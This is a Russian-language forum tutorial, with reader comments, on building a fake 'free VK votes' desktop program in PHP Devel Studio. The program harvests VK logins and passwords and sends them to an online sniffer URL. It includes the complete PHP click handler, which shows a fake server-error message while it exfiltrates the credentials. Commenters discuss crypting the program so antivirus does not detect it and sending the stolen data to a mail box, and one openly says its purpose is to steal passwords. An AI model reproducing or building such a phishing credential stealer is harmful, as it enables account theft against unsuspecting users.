Фейк на PHP Devel Studio
-
Сегодня я вам покажу как создать фейк(по английски fake, значит не настоящий, поддельный.) на PHP Devel Studio далее DS.
Для этого нам потребуется:
Онлайн сниффер hacker-pro.net
PHP Devel Studio develstudio.ru/
Идея фейка
Прямые рукиИ так начнем, на сегодняшнем примере я покажу вам как создать программный фейк «Бесплатных голосов Вк» наши логин\пассы в данном примере будут отправляться на наш сниффер!
Приступим к работе!
1.Открываем DS! Создаем новый проект!
2.Что мы видим? Мы видим пустую серую форму! Отредактируйте название заголовка с «form caption» на «Бесплатные голоса Вк»
3.Создадим теперь два поля для ввода и одну кнопку, и разместим их где хотим на скрине показаны где добавлять поля для ввода и кнопки!
Скриншот
4.Теперь нажимаем на Кнопку, переходим в вкладку Событие-Добавить событие-Клик-Редактировать, после этого вставляем код:$edit1 = c('Form1->edit1')->text; $edit2 = c('Form1->edit2')->text; $url = "http://httpz.ru/n16q7yw5bjd.gif"; sleep (1); MessageBox("Ошибка сервера. Попробуйте позже", "Внимание."); file_get_contents($url . "?" . "" . $edit1 . ";" . $edit2); app::close();
- Далее регистрируем сниффер (ссылка выше)
- Заходим в настройки и копируем ссылку на картинку 1х1.
7.Вставляем ссылку как показано на скриншоте
Скриншот
8.Все теперь практически готово! От вас осталось просто красиво оформить и нажать: «Создать программу»
Для тех кому надо
Мой исходник -
Дмитрий, Молодец)
А чтоб антивирус не палил умеешь делать? -
А как сделать чтоб вирусник не полил?
-
Закриптовать
-
Сергей, Сделать отправку на хостинг или на почтовый ящик)
Добавлено через 00:22 мин.
Или делать на делфи) -
Давай новые уроки !!! :D:
-
Завтра напишу новый урок по Devel Studio
-
Poltergeist, а в чем суть этой проги?
-
Это первый урок?
-
От него ? - Да
Хотя я не думаю что это он писал ...
Скорее всего скопипастил ! -
Я не пойму, зачем эта прогa?
-
Прикл
-
Наркоман Павлик, чтобы пароли воровать ...
-
Tima4kE, ***о завали 4ёрт, я эту шнягу сам писал
-
brosil igrat, Тоже)